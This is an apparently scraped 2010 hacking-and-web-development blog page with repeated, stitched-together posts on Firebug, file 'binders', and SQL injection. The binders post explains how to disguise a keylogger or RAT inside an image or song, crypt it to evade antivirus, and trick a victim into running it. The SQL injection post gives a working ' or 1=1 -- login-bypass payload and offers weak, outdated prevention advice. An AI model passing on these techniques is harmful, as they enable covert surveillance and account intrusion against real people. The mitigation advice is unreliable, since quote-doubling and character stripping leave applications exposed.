5. Explore the DOM
6. Analyze AJAX calls
For more information and updates on Firebug please visit http://getfirebug.com/whatisfirebug
Firebug is an extension for Firefox, but that doesn't mean it works only on Firefox. What happens when we want to test our pages against Internet Explorer, Opera, or Safari? Firebug Lite is the solution for this. It's a product that can be easily included in our file via a JavaScript call, just like any other JavaScript, to support all non-Firefox browsers. It will simulate some of the features of Firebug in our non-Firefox browsers. Chrome already has firebug Lite as a extension.
For more information and updates on Firebug Lite, please visit http://getfirebug.com/firebuglite
Firebug is an extension for Firefox that allows debugging, editing, and monitoring of any website's CSS, HTML, DOM, and JavaScript. It also allows performance analysis of a website. Furthermore, it has a JavaScript console for logging errors and watching values. Firebug simply makes it easier to develop websites/applications. It is one of the best web development extensions for Firefox. Firebug provides all the tools that a web developer needs to analyze, debug, and monitor JavaScript, CSS, HTML, and AJAX. It also includes a debugger, error console, command line, and a variety of useful inspectors.
Firebug capabilities
1. Inspect and edit HTML
2. Inspect and edit CSS and visualize CSS metrics
3. Use a performance tuning application
4. Profile and debug JavaScript
5. Explore the DOM
6. Analyze AJAX calls
For more information and updates on Firebug please visit http://getfirebug.com/whatisfirebug
Firebug is an extension for Firefox, but that doesn't mean it works only on Firefox. What happens when we want to test our pages against Internet Explorer, Opera, or Safari? Firebug Lite is the solution for this. It's a product that can be easily included in our file via a JavaScript call, just like any other JavaScript, to support all non-Firefox browsers. It will simulate some of the features of Firebug in our non-Firefox browsers. Chrome already has firebug Lite as a extension.
For more information and updates on Firebug Lite, please visit http://getfirebug.com/firebuglite
Saturday, June 5, 2010
Binders
Binder is a software used to combine or bind two or more files in one file under one name and extension like viruses, trojans etc. with images, mp3, exe, batch files. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application ( Keylogger or RAT) the application is also run when the actual binded file is run.
So, you can bind keylogger or RAT with image, movie or song (any file depending on victim) and then ask victim to run this binded file on his computer. When the victim runs your binded file(supposed binded with keylogger) on his computer, keylogger is installed on his computer and you can easily obtain all his typed keylogs.
Binders though are useful in hiding keylogger or trojans are often detected by antiviruses as hacktools and hence deleted as viruses. Thus it is better to use Crypters to avoid Anti-virus detection. It is general practice to first crypt the keylogger or trojan with Crypter and then bind the crypted trojan to make it deceptive. There are many Binders and Crypters available on the net and forums.
So, you can bind keylogger or RAT with image, movie or song (any file depending on victim) and then ask victim to run this binded file on his computer. When the victim runs your binded file(supposed binded with keylogger) on his computer, keylogger is installed on his computer and you can easily obtain all his typed keylogs.
Binders though are useful in hiding keylogger or trojans are often detected by antiviruses as hacktools and hence deleted as viruses. Thus it is better to use Crypters to avoid Anti-virus detection. It is general practice to first crypt the keylogger or trojan with Crypter and then bind the crypted trojan to make it deceptive. There are many Binders and Crypters available on the net and forums.
Thursday, June 3, 2010
SQL Injection Exposed
Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. An SQL query comprises one or more SQL commands, such as SELECT, UPDATE or INSERT. SQL injection is currently the most common form of web site attack. In that web forms are very common, they are often not coded properly and the hacking tools that can be used to find weaknesses and take advantage of them are commonly available online.
Example of SQL Injection:
SELECT queries, has a clause by which it returns data. Suppose for any website my username is "arpit" and password is also "arpit". I entered a username "arpit" and password "arpit" in the form, then I would be logged in. The query that runs behind would look something like this:
SELECT userId FROM Users WHERE userName='arpit' AND userPass='arpit';
but what about if I entered a username "arpit" and a password " ' or 1=1 --" .
[All inputs are without double quotes]
The resultant query would now look like this:
SELECT userId FROM Users WHERE userName='arpit' AND userPass=' 'or 1=1 --'
The query now only checks for any user with a username "arpit" with empty password, or the conditional equation of 1=1. This means that if the password field is empty OR 1 equals 1 (which it does), then a valid row has been found in the users table. Last quote is commented out with a single-line comment delimiter (--). This stops returning an error about any unclosed quotations. Doing the same thing to the username field, like this:
Username: ' or 1=1 ---
Password: [Empty]
This would execute the following query against the users table:
SELECT userId FROM Users WHERE userName=' ' or 1=1 --' AND userPass='[Anything] '
Then we would also be logged in as a user that has the first entry in users table. For more information about SQL Injection visit http://www.unixwiz.net/techtips/sql-injection.html and search on google about it.
Preventing SQL Injection Attacks
If you design your scripts and applications with care, SQL injection attacks can be avoided most of the time. There are a number of things that we as developers can do to reduce our site's susceptibility to attack.
1. Replacing quotes : Majority of injection attacks require single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding.
2. Limit the Length of User Input
3. Remove Culprit Characters/Character Sequences
Example of SQL Injection:
SELECT queries, has a clause by which it returns data. Suppose for any website my username is "arpit" and password is also "arpit". I entered a username "arpit" and password "arpit" in the form, then I would be logged in. The query that runs behind would look something like this:
SELECT userId FROM Users WHERE userName='arpit' AND userPass='arpit';
but what about if I entered a username "arpit" and a password " ' or 1=1 --" .
[All inputs are without double quotes]
The resultant query would now look like this:
SELECT userId FROM Users WHERE userName='arpit' AND userPass=' 'or 1=1 --'
The query now only checks for any user with a username "arpit" with empty password, or the conditional equation of 1=1. This means that if the password field is empty OR 1 equals 1 (which it does), then a valid row has been found in the users table. Last quote is commented out with a single-line comment delimiter (--). This stops returning an error about any unclosed quotations. Doing the same thing to the username field, like this:
Username: ' or 1=1 ---
Password: [Empty]
This would execute the following query against the users table:
SELECT userId FROM Users WHERE userName=' ' or 1=1 --' AND userPass='[Anything] '
Then we would also be logged in as a user that has the first entry in users table. For more information about SQL Injection visit http://www.unixwiz.net/techtips/sql-injection.html and search on google about it.
Preventing SQL Injection Attacks
If you design your scripts and applications with care, SQL injection attacks can be avoided most of the time. There are a number of things that we as developers can do to reduce our site's susceptibility to attack.
1. Replacing quotes : Majority of injection attacks require single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding.
2. Limit the Length of User Input
3. Remove Culprit Characters/Character Sequences
Subscribe to:
Posts (Atom)